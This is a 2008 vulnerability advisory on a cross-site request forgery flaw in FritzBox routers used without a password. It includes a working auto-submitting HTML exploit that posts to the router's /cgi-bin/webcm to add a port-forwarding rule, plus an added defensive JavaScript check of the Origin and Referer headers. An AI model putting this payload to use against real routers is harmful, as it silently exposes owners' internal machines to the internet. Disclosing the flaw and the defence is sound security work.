SECURITYVULNS:DOC:20626
Sep 30, 2008 - 12:00 a.m.

FritzBox


######################################

Exploitation: Remote with browser

Exploit: Available

Impact: Medium

Fix: N/A

######################################

####################

  • Description:
    ####################
    FritzBox settings can be changed via XSRF (cross-site request forgery).

####################

  • Vulnerability:
    ####################
    XSRF vulnerability when the FritzBox is used without password login.

####################

  • Example exploit for port forwarding:
    ####################
    <html>
    <body onLoad="javascript:document.form.submit()">
    <form action="http://www.fritz.box/cgi-bin/webcm" method="POST" name="form">
    <input type="hidden" name="getpage" value="…/html/de/menus/menu2.html">
    <input type="hidden" name="errorpage" value="…/html/de/menus/menu2.html">
    <input type="hidden" name="var:lang" value="de">
    <input type="hidden" name="var:pagename" value="portfw">
    <input type="hidden" name="var:errorpagename" value="portrule">
    <input type="hidden" name="var:menu" value="internet">
    <input type="hidden" name="var:pagemaster" value="">
    <input type="hidden" name="var:rule" value="rule3">
    <input type="hidden" name="var:isnew" value="1">
    <input type="hidden" name="var:isexp" value="0">
    <input type="hidden" name="forwardrules:settings/rule3/activated" value="1">
    <input type="hidden" name="forwardrules:settings/rule3/description" value="HTTP-Server">
    <input type="hidden" name="forwardrules:settings/rule3/protocol" value="TCP">
    <input type="hidden" name="forwardrules:settings/rule3/port" value="80">
    <input type="hidden" name="forwardrules:settings/rule3/endport" value="80">
    <input type="hidden" name="forwardrules:settings/rule3/fwip" value="192.168.178.24">
    <input type="hidden" name="forwardrules:settings/rule3/fwport" value="80">
    </form>
    </body>
    </html>

(This is only example code for port forwarding; other settings use other variables.)

####################

  • Solution:
    ####################
    Use the FritzBox only with a password.

thx to skskilL & NBBN
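
Added example (not part of the original advisory and not AVM firmware code): a server-side check that would reject the forged cross-site POST to /cgi-bin/webcm shown above, by validating the Host header and the Origin/Referer of state-changing requests. The function names, the TRUSTED_HOSTS list and the sample header values are assumptions made for illustration.

```javascript
// Added example, not AVM code. TRUSTED_HOSTS is an assumed list of names
// under which the device serves its own web interface.
const TRUSTED_HOSTS = new Set(["fritz.box", "www.fritz.box"]);
const STATE_CHANGING = new Set(["POST", "PUT", "PATCH", "DELETE"]);

// Return the lowercase hostname of a URL header value, or null if unusable.
function hostOf(value) {
  if (!value || value === "null") return null; // opaque origins send "null"
  try {
    return new URL(value).hostname.toLowerCase();
  } catch {
    return null;
  }
}

// Decide whether a request may be processed.
// headers: object with lowercase header names, as Node's http module provides.
function checkRequest(method, headers) {
  // The Host header must be a name the device answers to. This also rejects
  // requests that reach the device under a foreign DNS name (DNS rebinding).
  const host = hostOf("http://" + (headers["host"] || ""));
  if (!host || !TRUSTED_HOSTS.has(host)) {
    return { allow: false, reason: "untrusted Host" };
  }
  if (!STATE_CHANGING.has(method.toUpperCase())) {
    return { allow: true, reason: "safe method" };
  }
  // A form auto-submitted from another site carries that site's Origin
  // (or Referer in browsers that send no Origin).
  const source =
    headers["origin"] !== undefined ? headers["origin"] : headers["referer"];
  const sourceHost = hostOf(source);
  if (sourceHost === null) {
    return { allow: false, reason: "no usable Origin/Referer" };
  }
  if (!TRUSTED_HOSTS.has(sourceHost)) {
    return { allow: false, reason: "cross-site origin" };
  }
  return { allow: true, reason: "same-site origin" };
}
```

A check like this complements the password login recommended under Solution; it does not replace it.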